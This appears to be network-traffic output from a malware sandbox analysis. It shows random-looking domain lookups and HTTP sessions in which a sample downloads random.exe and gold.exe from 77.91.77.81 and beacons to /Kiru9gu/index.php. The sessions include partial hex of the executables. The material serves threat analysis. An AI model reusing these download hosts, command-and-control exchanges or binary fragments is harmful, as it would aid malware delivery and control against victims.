Jun 27, 2024 05:58:36.117573977 CEST	192.168.2.7	1.1.1.1	0x633	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:36.117782116 CEST	192.168.2.7	1.1.1.1	0xed8d	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jun 27, 2024 05:58:37.704225063 CEST	192.168.2.7	1.1.1.1	0xfca6	Standard query (0)	facilitycoursedw.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.718326092 CEST	192.168.2.7	1.1.1.1	0xff75	Standard query (0)	publicitycharetew.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.729906082 CEST	192.168.2.7	1.1.1.1	0x1cd7	Standard query (0)	computerexcudesp.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.741677999 CEST	192.168.2.7	1.1.1.1	0x3bb	Standard query (0)	leafcalfconflcitw.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.751929045 CEST	192.168.2.7	1.1.1.1	0xebb4	Standard query (0)	injurypiggyoewirog.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.765217066 CEST	192.168.2.7	1.1.1.1	0xe332	Standard query (0)	bargainnygroandjwk.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.777945042 CEST	192.168.2.7	1.1.1.1	0x26c2	Standard query (0)	disappointcredisotw.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.789371014 CEST	192.168.2.7	1.1.1.1	0x47f5	Standard query (0)	doughtdrillyksow.shop	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:53.274509907 CEST	192.168.2.7	1.1.1.1	0x6a61	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:54.332741022 CEST	192.168.2.7	1.1.1.1	0x68	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:55.759093046 CEST	192.168.2.7	1.1.1.1	0xda21	Standard query (0)	biancolevrin.com	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:57.467338085 CEST	192.168.2.7	1.1.1.1	0x6fcc	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:58.102974892 CEST	192.168.2.7	1.1.1.1	0x80b7	Standard query (0)	pixel.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 27, 2024 05:58:13.443957090 CEST	1.1.1.1	192.168.2.7	0xbda9	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jun 27, 2024 05:58:30.680681944 CEST	1.1.1.1	192.168.2.7	0x65be	No error (0)	moreapp4you.online		31.31.196.208	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:32.083492994 CEST	1.1.1.1	192.168.2.7	0xc84b	No error (0)	iplogger.co		172.67.167.249	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:32.083492994 CEST	1.1.1.1	192.168.2.7	0xc84b	No error (0)	iplogger.co		104.21.82.93	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:32.083525896 CEST	1.1.1.1	192.168.2.7	0x87ca	No error (0)	iplogger.co			65	IN (0x0001)	false
Jun 27, 2024 05:58:34.312597036 CEST	1.1.1.1	192.168.2.7	0x5045	No error (0)	iplogger.co		172.67.167.249	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:34.312597036 CEST	1.1.1.1	192.168.2.7	0x5045	No error (0)	iplogger.co		104.21.82.93	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:34.312860012 CEST	1.1.1.1	192.168.2.7	0xc181	No error (0)	iplogger.co			65	IN (0x0001)	false
Jun 27, 2024 05:58:36.124720097 CEST	1.1.1.1	192.168.2.7	0x633	No error (0)	www.google.com		216.58.206.36	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:36.125139952 CEST	1.1.1.1	192.168.2.7	0xed8d	No error (0)	www.google.com			65	IN (0x0001)	false
Jun 27, 2024 05:58:37.714215994 CEST	1.1.1.1	192.168.2.7	0xfca6	Name error (3)	facilitycoursedw.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.728722095 CEST	1.1.1.1	192.168.2.7	0xff75	Name error (3)	publicitycharetew.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.738923073 CEST	1.1.1.1	192.168.2.7	0x1cd7	Name error (3)	computerexcudesp.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.750667095 CEST	1.1.1.1	192.168.2.7	0x3bb	Name error (3)	leafcalfconflcitw.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.761985064 CEST	1.1.1.1	192.168.2.7	0xebb4	Name error (3)	injurypiggyoewirog.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.775788069 CEST	1.1.1.1	192.168.2.7	0xe332	Name error (3)	bargainnygroandjwk.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.787470102 CEST	1.1.1.1	192.168.2.7	0x26c2	Name error (3)	disappointcredisotw.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:37.797985077 CEST	1.1.1.1	192.168.2.7	0x47f5	Name error (3)	doughtdrillyksow.shop	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:53.281817913 CEST	1.1.1.1	192.168.2.7	0x6a61	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:54.339437008 CEST	1.1.1.1	192.168.2.7	0x68	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:54.339437008 CEST	1.1.1.1	192.168.2.7	0x68	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:54.339437008 CEST	1.1.1.1	192.168.2.7	0x68	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:54.339437008 CEST	1.1.1.1	192.168.2.7	0x68	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:56.703263044 CEST	1.1.1.1	192.168.2.7	0xda21	No error (0)	biancolevrin.com		103.28.36.182	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:57.474442005 CEST	1.1.1.1	192.168.2.7	0x6fcc	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:57.474442005 CEST	1.1.1.1	192.168.2.7	0x6fcc	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:58:58.359338999 CEST	1.1.1.1	192.168.2.7	0x80b7	No error (0)	pixel.com		54.67.42.145	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.431278944 CEST	1.1.1.1	192.168.2.7	0xc9a1	Name error (3)	compilecoppydkewsw.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.446981907 CEST	1.1.1.1	192.168.2.7	0x2812	Name error (3)	exertcreatedadnndjw.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.458983898 CEST	1.1.1.1	192.168.2.7	0x589d	Name error (3)	depositybounceddwk.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.474431038 CEST	1.1.1.1	192.168.2.7	0xbc6b	Name error (3)	slammyslideplanntywks.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.486511946 CEST	1.1.1.1	192.168.2.7	0xacb8	Name error (3)	manufactiredowreachhd.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.511851072 CEST	1.1.1.1	192.168.2.7	0x440c	Name error (3)	aplointexhausdh.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.524027109 CEST	1.1.1.1	192.168.2.7	0x3778	Name error (3)	panameradovkews.xyz	none	none	A (IP address)	IN (0x0001)	false
Jun 27, 2024 05:59:32.534950972 CEST	1.1.1.1	192.168.2.7	0x25fd	Name error (3)	proffyrobharborye.xyz	none	none	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49726	77.91.77.81	80	6620	C:\Users\user\Desktop\1Vkf7silOj.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:36.660650015 CEST	76	OUT	GET /soka/random.exe HTTP/1.1 Host: 77.91.77.81 Connection: Keep-Alive
Jun 27, 2024 05:58:37.342556000 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:37 GMT Content-Type: application/octet-stream Content-Length: 1850368 Last-Modified: Thu, 27 Jun 2024 00:47:45 GMT Connection: keep-alive ETag: "667cb6b1-1c3c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a cf 5e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL*^fpI@I(@XlPIPPI @.rsrc@.idata @ )@tpchzztf000$@yamaqmnm`I@.taggant0pI"@
Jun 27, 2024 05:58:37.342577934 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 27, 2024 05:58:37.342588902 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 27, 2024 05:58:37.342784882 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jun 27, 2024 05:58:37.342797041 CEST	896	IN	Data Raw: 03 54 d0 89 39 60 6a e7 93 b0 be 33 21 50 8f 6b 98 53 33 f8 14 ab 49 ef aa d8 3d 83 ff 54 10 89 79 f4 43 e0 ee c0 ff 89 91 47 3d 76 1a 60 8d 88 92 94 ab 88 6d 45 4d 96 1a 00 7b 20 a6 d4 03 b7 69 f4 bf 92 e3 61 43 b7 59 f8 0a 41 c4 70 ae ab 09 b8 Data Ascii: T9`j3!PkS3I=TyCG=v`mEM{ iaCYAp.v8rTSNRG,{7Jc^32T`3p-x&b+!BVb\|C0PC dC=s@uz`+8?W:g\{s^{/+Z;Bo~Bc!,736C`
Jun 27, 2024 05:58:37.343154907 CEST	1236	IN	Data Raw: 52 0b 17 af 95 d3 03 56 21 c0 c2 87 72 7d 3a 87 e9 50 e7 2b eb 21 72 b7 43 5b ca 67 c5 f8 42 db fb 62 50 b8 b9 32 43 20 17 c0 a3 77 99 50 77 6b fb 61 ff 69 59 53 0a 4c 09 b4 63 af 09 8c 3d d6 ca 52 53 d2 06 4b 57 b3 59 12 43 b8 9d 5f 42 f6 1a e0 Data Ascii: RV!r}:P+!rC[gBbP2C wPwkaiYSLc=RSKWYC_B{@+MpjRTwP3k=iPC@=Vsvcc?!i>_CTPcpEM{@WcB`EBbxJ,#z]wf=Q0w=&`bW:b;.}I)=
Jun 27, 2024 05:58:37.343167067 CEST	1236	IN	Data Raw: 8a 2a 32 34 50 98 e6 f4 24 da bf 0a 8f 02 57 b9 83 c0 3d b6 6a f3 e7 65 da d4 6a bc 0a 0f 43 69 6b 24 5c e8 6a b0 73 df 09 61 f8 f2 83 ad 0d 57 1f 07 0b 15 63 b6 70 b7 b3 b2 e3 3f 60 79 1f 98 af 85 1a 25 4b 41 29 70 81 d8 3b 2a 1d dc 73 bf af 15 Data Ascii: 24P$W=jejCik$\jsaWcp?`y%KA)p;st8a!RMayZ`K`r\|}xx+#%n<C =y`0]#Kj%}lm}E-WU#`*_Cc,D\Icq;
Jun 27, 2024 05:58:37.343177080 CEST	1236	IN	Data Raw: a5 e9 cd 69 f4 86 aa 31 00 e0 b9 5b a3 d0 e4 df 25 09 e8 aa 28 54 ae c7 fa 30 73 21 aa f7 7e 62 39 04 17 4d b9 48 6b 48 6d f3 db 01 7a 4a d1 60 fd 3d ca d3 da 20 0b 4c b6 01 14 88 9b 04 de ab a0 7c 2b 27 75 07 45 b6 f1 51 e3 6b d7 7b 0c cf 67 fd Data Ascii: i1[%(T0s!~b9MHkHmzJ`= L\|+'uEQk{g1lI.[>&X/hb@!z<"'8gr[{yN<07~5h8[P`qq11p4If9-tm:'j6F%?wz'J}$>GO;)
Jun 27, 2024 05:58:37.343189001 CEST	1236	IN	Data Raw: 51 e4 2b 97 24 38 53 0f 61 e6 73 20 19 55 2d 07 a2 17 93 04 84 87 97 27 dc cc fc c1 da ba 52 42 1c f2 36 cb 42 e8 33 01 6c 86 63 d2 1a c8 38 62 e9 90 bc 0d 18 20 f4 98 22 93 57 84 c5 21 12 76 a4 bf 77 26 59 07 18 90 3c 76 5a 8f a1 62 7f 9a 69 6f Data Ascii: Q+$8Sas U-'RB6B3lc8b "W!vw&Y<vZbiou~4(0+%J24L}4J:Pl{ai\|rY+?YErH+7"euvmxoamS$R1 !f.%~"*j~yq{4fjlB
Jun 27, 2024 05:58:37.343200922 CEST	1236	IN	Data Raw: 38 38 b5 e8 c8 0b 51 52 f6 a2 9d 6a 37 93 a8 85 6b 2f 67 2a df f4 40 84 7a 22 85 13 59 10 78 2c 4c 0b 57 5b 30 45 ab f4 d1 3e a3 ca 6b 9a 7f aa a3 b2 a3 c7 6b c0 77 b7 59 bb 55 aa 52 f0 bc 97 a1 6e 02 7b e1 07 81 75 e9 87 56 d2 06 e0 43 2c 03 22 Data Ascii: 88QRj7k/g@z"Yx,LW[0E>kkwYURn{uVC,"b38v `M_#SrKjMH-3`f9df+`%wb\5Er ky=uY\Xc+]V=_Vu6- 8P*#(aA'ym(I
Jun 27, 2024 05:58:37.348587990 CEST	1236	IN	Data Raw: e3 f4 76 34 0d 75 b0 df 2a 43 e2 ee 4d 66 13 87 05 75 19 e8 59 61 d4 a5 e7 8b f4 c0 5c d7 3c 68 6e bd 6e 85 e9 5e e2 ea 38 51 b1 e4 6b d1 8a 39 e9 79 62 f2 1c f4 80 cc e2 eb 29 ee db b5 ba f5 da 5a e2 e8 79 72 70 23 36 75 36 c3 9e ef 35 bb 85 d0 Data Ascii: v4u*CMfuYa\<hnn^8Qk9yb)Zyrp#6u6535nktU9uE50fS6Sg8:GO1LCj:b<}C;j3:;'t@;dO24U{=-2K\I:tC0S}uYc/If

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49729	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:58:47.477962971 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:58:48.179364920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:58:48.182729006 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:58:48.423357964 CEST	1012	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 33 35 0d 0a 20 3c 63 3e 31 30 30 30 30 33 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 39 66 32 34 63 35 33 66 35 38 33 35 61 37 65 66 31 38 62 31 36 66 39 34 38 38 38 37 35 39 62 65 32 61 64 65 37 32 66 66 38 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 35 39 61 35 66 36 37 65 65 38 31 31 66 66 38 31 35 64 63 32 64 64 30 38 33 61 66 66 66 30 66 66 64 65 39 66 66 61 30 35 65 32 35 65 62 66 63 36 33 23 31 30 30 30 30 39 31 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 31 64 66 34 39 66 61 31 61 32 30 62 31 65 61 63 64 38 30 66 36 37 62 63 64 63 34 61 66 39 34 32 39 66 37 32 39 61 61 31 61 62 65 36 32 37 65 65 66 38 65 64 61 30 31 32 33 32 62 63 61 62 34 30 37 61 37 65 64 61 33 31 38 31 35 66 64 30 62 63 36 38 61 66 39 61 62 61 62 39 31 32 39 35 62 63 65 36 33 31 39 37 30 64 62 37 66 39 30 30 31 36 35 62 36 30 33 64 64 64 62 31 31 33 32 64 64 65 61 66 61 62 35 63 32 39 38 65 34 39 30 64 35 63 [TRUNCATED] Data Ascii: 335 <c>1000035001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2ade72ff8b3ffab4f#1000064001+++aa0ed36554e19fbffd5744f59a5f67ee811ff815dc2dd083afff0ffde9ffa05e25ebfc63#1000091001+++aa0ed3651df49fa1a20b1eacd80f67bcdc4af9429f729aa1abe627eef8eda01232bcab407a7eda31815fd0bc68af9abab91295bce631970db7f900165b603dddb1132ddeafab5c298e490d5c7021a54d9b#1000108001+++aa0ed36554e19fb7f14c58f6954378e98509e110c26c8fe0a3e620f0e8feb65924e2e0743d77c77b#1000109001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2abe426e4a8afe61f3ebbb128766ada#1000110001+++aa0ed36554e19fb9f24c53f5835a7ef18b16f94888759be2fbba70b2f8e2b6#1000111001+++aa0ed36554e19fbaf64c5bf19e437de69d13ef1ed523c7f5e5ec2cebf3b59c1949b8f35f2448d4589b5292bc71b9#1000112001+++aa0ed36554e19fbaf64c5bf19e437de69d13ef1ed523c7f5e5ec2cebf3b5875a5cd9c95363778f52b66c92bc71b9#<d>0
Jun 27, 2024 05:58:48.430171967 CEST	50	OUT	GET /lend/gold.exe HTTP/1.1 Host: 77.91.77.81
Jun 27, 2024 05:58:48.649271011 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:58:48 GMT Content-Type: application/octet-stream Content-Length: 505344 Last-Modified: Mon, 24 Jun 2024 19:43:11 GMT Connection: keep-alive ETag: "6679cc4f-7b600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 86 4f 44 4d c2 2e 2a 1e c2 2e 2a 1e c2 2e 2a 1e 11 5c 29 1f d3 2e 2a 1e 11 5c 2f 1f 6b 2e 2a 1e 11 5c 2e 1f d4 2e 2a 1e 00 af 2e 1f d0 2e 2a 1e 11 5c 2b 1f cb 2e 2a 1e c2 2e 2b 1e 45 2e 2a 1e 00 af 2f 1f 9e 2e 2a 1e 00 af 29 1f da 2e 2a 1e 31 ac 2f 1f c3 2e 2a 1e 31 ac 28 1f c3 2e 2a 1e 52 69 63 68 c2 2e 2a 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ce 9c 79 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 14 02 00 00 ae 05 00 00 00 00 00 e8 96 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ODM...\).\/k.\....\+..+E./.).1/.1(.Rich.PELyf'0@@d(!@0.text `.BSs `.rdata0@@.data@.reloc(!"@B
Jun 27, 2024 05:58:48.649286985 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 f8 b6 47 00 e8 09 53 00 00 68 52 13 42 00 e8 5d 89 00 00 59 c3 6a 08 b8 1b 0f Data Ascii: GShRB]YjBmGEpGEeGh2BEhlBPh\|G2]Mh\BjZBdGEGEedGH7BEhBPhG\Mh_B
Jun 27, 2024 05:58:48.649297953 CEST	1236	IN	Data Raw: c7 46 04 01 00 00 00 c7 46 08 00 00 00 00 c7 00 00 00 00 00 c7 40 04 00 00 00 00 e8 4a 59 00 00 8d 46 14 0f 57 c0 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 0f 11 40 0c 6a 02 66 0f d6 40 1c c7 40 24 00 00 00 00 50 c7 40 28 00 00 Data Ascii: FF@JYFW@@@jf@@$P@(@,ZFDPYD$FlFpfFtFvFx6BA$6BAI$^SUVWt$.06BEEEHtA
Jun 27, 2024 05:58:48.649358988 CEST	672	IN	Data Raw: ff 0f 77 21 57 ff 74 24 10 89 7b 10 53 c7 43 14 0f 00 00 00 e8 46 8f 00 00 83 c4 0c c6 04 1f 00 5f 5b c2 08 00 8b c7 83 c8 0f 3d ff ff ff 7f 76 07 b8 ff ff ff 7f eb 0a b9 16 00 00 00 3b c1 0f 42 c1 89 44 24 10 8d 44 24 10 56 50 53 e8 3d ff ff ff Data Ascii: w!Wt${SCF_[=v;BD$D$VPS=L$Wt$3V{K>^_[;Ujh@BdPSVWG3PEde]U+EC+=Hx}s++;v,u"P
Jun 27, 2024 05:58:48.649477959 CEST	1236	IN	Data Raw: 8d 04 1e 8b 5d e0 3b c3 0f 43 d8 81 fb ff ff ff 3f 0f 87 0c 01 00 00 8d 04 9d 00 00 00 00 89 45 dc 89 5d ec 3d 00 10 00 00 72 2d 8d 48 23 3b c8 0f 86 ed 00 00 00 51 e8 a5 7a 00 00 83 c4 04 85 c0 0f 84 e6 00 00 00 8d 70 23 83 e6 e0 89 46 fc 8b 4d Data Ascii: ];C?E]=r-H#;Qzp#FMU"tPzE]MU3]uEEG;u+PQV+RQVKGU+PRQEt,O+r#P+w?QP
Jun 27, 2024 05:58:48.649487972 CEST	1236	IN	Data Raw: 8b 3d 70 b9 47 00 8b 4c 24 64 8d 1c bd 00 00 00 00 8b 49 04 3b 79 0c 73 10 8b 41 08 8b 34 03 85 f6 0f 85 18 01 00 00 eb 02 33 f6 80 79 14 00 74 10 e8 1c 54 00 00 3b 78 0c 73 0e 8b 40 08 8b 34 03 85 f6 0f 85 f6 00 00 00 85 ed 74 15 8d 4c 24 18 8b Data Ascii: =pGL$dI;ysA43ytT;xs@4tL$[B_^][PjuD$d@txuxt3BjL$0A3D$0D$4D$8D$<D$@fD$DD$HfD$LD$PD$TD$XD$\toD$,WPhTD$$
Jun 27, 2024 05:58:48.649497032 CEST	1236	IN	Data Raw: 8d 4c 24 48 c7 07 48 32 42 00 f3 0f 7e 44 24 28 66 0f d6 44 24 58 0f 57 c0 83 7c 24 5c 0f 66 0f 7e c8 66 0f d6 47 04 0f 11 4c 24 48 0f 47 c8 c6 44 24 14 01 8d 47 04 89 4c 24 10 50 8d 44 24 14 50 e8 2f 7e 00 00 8b 4c 24 64 83 c4 08 c7 07 b4 32 42 Data Ascii: L$HH2B~D$(fD$XW\|$\f~fGL$HGD$GL$PD$P/~L$d2Bv)T$HArP#+w?QRpL$hT$lOL$`2BW_^][3sTV/Vt$WWGPH2BfFP}2B
Jun 27, 2024 05:58:48.649507046 CEST	1236	IN	Data Raw: e8 9c 79 00 00 c7 07 c0 32 42 00 83 c4 08 8b 46 0c 8b 4e 10 89 47 0c 8b c7 89 4f 10 c7 07 ac 33 42 00 5f 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 1c a1 00 9e 47 00 33 c4 89 44 24 18 8b 54 24 20 0f 57 c0 8b 44 24 24 53 55 56 8b 58 04 Data Ascii: y2BFNGO3B_^G3D$T$ WD$$SUVXD$W8D$D$$ifAu+QRL$LD$PSW^L$$v)T$ArP#+w'QRkL$(_3B^][3n
Jun 27, 2024 05:58:48.649739981 CEST	1236	IN	Data Raw: 14 00 00 00 00 c7 46 18 00 00 00 00 8d 46 04 50 e8 7c 3f 00 00 83 c4 04 5e c3 e8 cf b0 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b f1 56 e8 ed 46 00 00 8b 46 2c 83 c4 04 85 c0 74 09 50 e8 f7 b0 00 00 83 c4 04 c7 46 2c 00 00 00 00 Data Ascii: FFP\|?^VVFF,tPF,F$tPF$FtPFFtPFFtPFFtPF^j3VFtAN+rP#+
Jun 27, 2024 05:58:48.650031090 CEST	1236	IN	Data Raw: 00 8b 0d b8 bc 47 00 8b 0c 88 a1 e8 b6 47 00 3b 81 04 00 00 00 7f 0b c7 05 f0 b6 47 00 e0 b6 47 00 c3 68 e8 b6 47 00 e8 76 65 00 00 83 c4 04 83 3d e8 b6 47 00 ff 75 df 68 20 13 42 00 e8 fa 64 00 00 68 e8 b6 47 00 e8 05 65 00 00 83 c4 08 eb c6 cc Data Ascii: GG;GGhGve=Guh BdhGeUjhBdPSVWG3PEdeURPEM7E;AM6tj7M:E(EPWM;Pc
